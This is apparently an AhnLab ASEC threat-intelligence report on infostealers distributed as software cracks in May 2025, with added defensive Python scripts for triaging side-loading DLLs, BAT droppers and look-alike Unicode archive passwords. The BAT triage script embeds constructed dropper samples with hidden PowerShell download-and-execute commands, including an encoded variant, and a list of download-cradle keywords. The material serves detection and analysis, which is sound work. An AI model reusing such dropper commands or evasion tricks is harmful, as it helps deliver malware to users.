May 2025 Infostealer Trend Report
This report provides statistics, trends, and case information on the distribution of Infostealer malware, including the distribution volume, methods, and disguises, based on the data collected and analyzed in May 2025. The following is a summary of the report.
1. Data Source and Collection Method
AhnLab SEcurity intelligence Center (ASEC) operates several systems that automatically collect Infostealer malware while it is being distributed, so that it can be responded to early. Collected samples are run through an automatic analysis system that determines whether they are malicious and extracts their C2 information. The results are provided in real time through the ATIP IOC service and can also be found under Related Information on the ATIP File Analysis Information page.
AhnLab’s self-developed systems
- Crack camouflage malware automatic collection system
- Email honeypot system
- Malware C2 automatic analysis system
ATIP real-time IOC service
- C2 and malware type analysis
- File Analysis Information – Related Information – Contacted URLs
The statistics in this report are intended to give an overall picture of the distribution volume, camouflage techniques, and trends of Infostealer malware.
2. Infostealers Disguised as Cracks
These statistics cover Infostealer malware distributed under the guise of illegal programs such as cracks and keygens. The threat actor uses SEO poisoning so that the distribution posts rank at the top of search results. ASEC has built a system that automatically collects malware distributed this way, analyzes its C2 information, and blocks the C2 in real time; the related information is also provided through ATIP. In May, the LummaC2, Vidar, StealC, Rhadamanthys, and Amadey Infostealers were distributed. Amadey was actively distributed in 2023 and has reappeared after a long hiatus.

Figure 1. Pages distributing malware
The chart below shows the quantity of malware distributed in this manner over the past year. The second series shows the number of samples AhnLab collected before any related information was available on VirusTotal, which indicates that AhnLab collected and responded to the majority of these samples through its own automatic collection system. Since the fourth quarter of last year, the distribution volume has remained roughly constant.

Chart 1. Quantity of malware distributed annually
The threat actor gets around security measures by creating distribution posts on legitimate websites: popular forums, the Q&A pages of specific companies, open forums, and comment sections. The following images show examples of distribution posts uploaded to such communities.

Figure 2. A distribution post published on the legitimate Facebook site

Figure 3. A distribution post published on the legitimate website (Thangs)
The Infostealers are executed in one of two ways: as a standalone EXE, or through DLL side-loading, where a legitimate EXE and a malicious DLL are placed in the same folder so that the malicious DLL is loaded when the legitimate EXE is run. Of the samples collected in May, approximately 95.4% were of the EXE type and 4.6% of the DLL side-loading type; the number of DLL side-loading samples has dropped significantly. A DLL side-loading sample is made by patching only a small portion of a legitimate DLL with malicious code, so it closely resembles the original file. As a result, many other security solutions may classify it as a legitimate file, and such files need to be examined with care.

Figure 4. Example of VirusTotal query result for DLL malware
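As an added illustration (this is not code from the report or from ASEC), the following Python script shows a triage pre-filter for the DLL side-loading layout described above: it parses just enough of each PE header to tell EXEs from DLLs and to see whether a certificate table (the Authenticode data directory) is present, then flags folders where a signed EXE sits beside an unsigned DLL. The PE images and file names are constructed, header-only stand-ins, not real samples.

```python
import struct

IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_DLL = 0x2000          # Characteristics flag set on DLLs
SECURITY_DIR_INDEX = 4           # data directory that points at the Authenticode WIN_CERTIFICATE blob
NUM_DIRS = 16


def build_minimal_pe(is_dll, signed, pe32plus=True):
    """Constructed header-only PE image used as sample input (it is not loadable).
    `signed` only fills the security data directory, as a real signed file would."""
    fixed_len, nrva_off = (112, 108) if pe32plus else (96, 92)
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)            # e_lfanew (offset 0x3C) -> 0x40
    chars = IMAGE_FILE_EXECUTABLE_IMAGE | (IMAGE_FILE_DLL if is_dll else 0)
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 0, 0, 0, 0,
                       fixed_len + NUM_DIRS * 8, chars)
    opt = bytearray(fixed_len + NUM_DIRS * 8)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)     # optional header Magic
    struct.pack_into("<I", opt, nrva_off, NUM_DIRS)                   # NumberOfRvaAndSizes
    if signed:
        # security directory = file offset and size of the certificate table (arbitrary values here)
        struct.pack_into("<II", opt, fixed_len + SECURITY_DIR_INDEX * 8, 0x1000, 0x800)
    return dos + b"PE\0\0" + coff + bytes(opt)


def pe_info(data):
    """Parse just enough of the PE headers to answer: DLL or EXE, and is a certificate table present?"""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    chars = struct.unpack_from("<HHIIIHH", data, coff)[6]             # Characteristics
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x20B:                                                # PE32+
        dir_base, nrva_off = 112, 108
    elif magic == 0x10B:                                              # PE32
        dir_base, nrva_off = 96, 92
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    ndirs = struct.unpack_from("<I", data, opt + nrva_off)[0]
    cert_size = 0
    if ndirs > SECURITY_DIR_INDEX:
        _, cert_size = struct.unpack_from("<II", data, opt + dir_base + SECURITY_DIR_INDEX * 8)
    return {"is_dll": bool(chars & IMAGE_FILE_DLL), "has_cert_table": cert_size > 0}


def sideload_candidates(folder):
    """folder: {file name: bytes}. Flag every (signed EXE, unsigned DLL) pair in the same directory."""
    info = {name: pe_info(blob) for name, blob in folder.items()}
    signed_exes = sorted(n for n, i in info.items() if not i["is_dll"] and i["has_cert_table"])
    unsigned_dlls = sorted(n for n, i in info.items() if i["is_dll"] and not i["has_cert_table"])
    return [(exe, dll) for exe in signed_exes for dll in unsigned_dlls]


# Constructed directory listing standing in for an unpacked "crack" folder.
SAMPLE_FOLDER = {
    "viewer.exe": build_minimal_pe(is_dll=False, signed=True),
    "helper.dll": build_minimal_pe(is_dll=True, signed=False),
    "vendor.dll": build_minimal_pe(is_dll=True, signed=True, pe32plus=False),
}

if __name__ == "__main__":
    for pair in sideload_candidates(SAMPLE_FOLDER):
        print("possible side-loading pair:", pair)
```

Presence of a certificate table is only a pre-filter. A DLL patched from a signed original usually keeps the original certificate blob, so the table is present but the signature no longer verifies; on Windows the authoritative check is Get-AuthenticodeSignature (Status HashMismatch for a modified file) or signtool verify, together with comparing the DLL's hash against the vendor's original.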
Trend #1
At the end of May, malware in the form of a BAT script was distributed for about a week, in two variants: one where the user downloaded the BAT file directly from the download page, and one where the BAT file was included in a compressed archive. The BAT script contains a command that invokes PowerShell to download and execute the malware from the C2 server. It was initially distributed in plain text, but various obfuscation techniques were added later. For more information, please refer to the ASEC Notes below.
- [AhnLab SEcurity intelligence Center (ASEC) Notes] Crack-Patched Infostealer Being Distributed in BAT Form
- https://atip.ahnlab.com/intelligence/view?id=be5008f5-1977-4a46-ba1b-7cd89063277d

Figure 5. Plain malware (left) and obfuscated malware (right)
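As an added example (not the report's sample, whose exact obfuscation is not shown here), the following Python code shows how an analyst can triage BAT droppers of the kind described: it expands set/%var% pieces that split up the word "powershell", decodes -EncodedCommand base64 (UTF-16LE) payloads, and then looks for download-and-run indicators and URLs. The two BAT scripts and the example.invalid URLs are constructed for this illustration.

```python
import base64
import re

# Constructed BAT samples (not the report's files; the URLs are placeholders).
# PLAIN_BAT is the plain-text form; OBFUSCATED_BAT splits "powershell" across
# set/%var% pieces and passes the command as -EncodedCommand (base64 of UTF-16LE).
PLAIN_BAT = r"""@echo off
powershell -w hidden -ep bypass -c "iwr http://example.invalid/p.exe -OutFile %TEMP%\p.exe; Start-Process %TEMP%\p.exe"
"""

_PS_CMD = "Invoke-WebRequest http://example.invalid/o.exe -OutFile $env:TEMP\\o.exe; Start-Process $env:TEMP\\o.exe"
_ENC = base64.b64encode(_PS_CMD.encode("utf-16-le")).decode("ascii")
OBFUSCATED_BAT = f"""@echo off
set a=pow
set b=ersh
set c=ell
%a%%b%%c% -w hidden -enc {_ENC}
"""

# Download-and-run cradle vocabulary (case-insensitive substring match after expansion)
DOWNLOAD_INDICATORS = ("iwr", "invoke-webrequest", "downloadstring", "downloadfile",
                       "net.webclient", "invoke-expression", "iex", "start-process",
                       "bitsadmin", "certutil", "curl")
SET_RE = re.compile(r"^\s*set\s+([A-Za-z_]\w*)=(.*?)\s*$", re.M | re.I)
VAR_RE = re.compile(r"%([A-Za-z_]\w*)%")
# -e / -ec / -enc / -encodedcommand followed by a base64 blob (\b stops "-ep" from matching)
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\b\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>;]+", re.I)


def resolve_set_vars(text):
    """Expand %name% references using plain 'set name=value' lines from the same script."""
    env = {m.group(1).lower(): m.group(2) for m in SET_RE.finditer(text)}
    out = text
    for _ in range(10):                       # bounded: tolerates nested or self-referencing vars
        new = VAR_RE.sub(lambda m: env.get(m.group(1).lower(), m.group(0)), out)
        if new == out:
            break
        out = new
    return out


def decode_encoded_commands(text):
    """Replace each -EncodedCommand blob with its decoded UTF-16LE text; return (text, [decoded])."""
    decoded = []

    def repl(m):
        try:
            cmd = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return m.group(0)                 # not a valid encoded command; leave it alone
        decoded.append(cmd)
        return "-EncodedCommand <decoded: %s>" % cmd

    return ENC_RE.sub(repl, text), decoded


def analyze_bat(text):
    """Return the triage verdict for one BAT script."""
    expanded, decoded = decode_encoded_commands(resolve_set_vars(text))
    hay = expanded.lower()
    return {
        "powershell": "powershell" in hay,
        "encoded_commands": decoded,
        "indicators": sorted(i for i in DOWNLOAD_INDICATORS if i in hay),
        "urls": sorted(set(URL_RE.findall(hay))),
    }


if __name__ == "__main__":
    for name, bat in (("plain", PLAIN_BAT), ("obfuscated", OBFUSCATED_BAT)):
        print(name, analyze_bat(bat))
```

The variable expansion is what makes the obfuscated sample readable: before it, the word "powershell" does not appear anywhere in the script, which is exactly what a keyword-only filter would miss.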
Trend #2
Cases of malware distribution through the Wormhole service have been detected. Wormhole is a file-sharing service that lets users host and distribute files without logging in. While that makes it convenient for distributing malware, hosting is limited to 24 hours and 100 downloads, which restricts mass distribution. The threat actor is believed to have used the service for about a week to test distribution; it is not currently in use.

Figure 6. Distribution of malware using the Wormhole service
Trend #3
Multiple samples were found in which the archive password given in the file name is written with Unicode characters instead of the usual ASCII characters. The file name in Figure 7 below appears to read “2025” to the naked eye, but the actual value is the UTF-8 byte sequence “f0 9d 9f ae f0 9d 9f ac f0 9d 9f ae f0 9d 9f b1” (the mathematical sans-serif bold digits U+1D7EE U+1D7EC U+1D7EE U+1D7F1, which render like 2025). This is deemed to be an attempt to bypass security devices or automation systems that extract password-protected archives using the password shown in the file name.

Figure 7. Sample of Unicode string password display

Figure 8. Sample of Unicode string password display (2)
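The following Python snippet, added here as an example and not part of the report, reproduces the byte values quoted above and shows the check an automated unpacker should perform: detect a password token whose NFKC compatibility form is plain ASCII, and try both the literal Unicode string and its ASCII fold, since the report does not say which of the two the archive was encrypted with. The file name and the pass_ marker are assumptions for illustration; the report does not state the naming format.

```python
import unicodedata

# Constructed file name (not one of the report's samples): the password token
# looks like "2025" but is U+1D7EE U+1D7EC U+1D7EE U+1D7F1, Mathematical
# Sans-Serif Bold digits, which encode to exactly the UTF-8 bytes quoted in the report.
SAMPLE_NAME = "Setup_Crack_pass_\U0001D7EE\U0001D7EC\U0001D7EE\U0001D7F1.rar"


def password_from_name(filename, marker="pass_"):
    """Pull the password token that follows `marker` in an archive name.
    The marker and its position are an assumption for this example; real naming varies."""
    stem = filename.rsplit(".", 1)[0]
    i = stem.rfind(marker)
    return None if i < 0 else stem[i + len(marker):]


def utf8_hex(s):
    """UTF-8 bytes as the space-separated hex the report quotes."""
    return s.encode("utf-8").hex(" ")


def is_confusable(token):
    """True when the token contains non-ASCII code points whose compatibility (NFKC) form is plain ASCII,
    i.e. it looks like ASCII on screen but is not."""
    return not token.isascii() and unicodedata.normalize("NFKC", token).isascii()


def password_candidates(token):
    """Strings an automated unpacker should try, in order: the literal token, then its NFKC fold
    (what a human reading the screen would type), if that differs."""
    cands = [token]
    folded = unicodedata.normalize("NFKC", token)
    if folded != token:
        cands.append(folded)
    return cands


if __name__ == "__main__":
    tok = password_from_name(SAMPLE_NAME)
    print("looks like:", unicodedata.normalize("NFKC", tok))
    print("actual UTF-8:", utf8_hex(tok))
    print("confusable:", is_confusable(tok))
    print("candidates:", password_candidates(tok))
```

An unpacker that reads the password from a post or file name and tries only the ASCII string it "sees" will fail on such archives; passing the raw code points through unchanged, and logging an alert when is_confusable() fires, closes that gap.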
For statistics not covered in this summary (decoy target companies, original file names, distribution statistics, and product detection statistics) and for information on Infostealers delivered via phishing emails, please refer to the full ATIP report.
※ For more information, please refer to the attachment.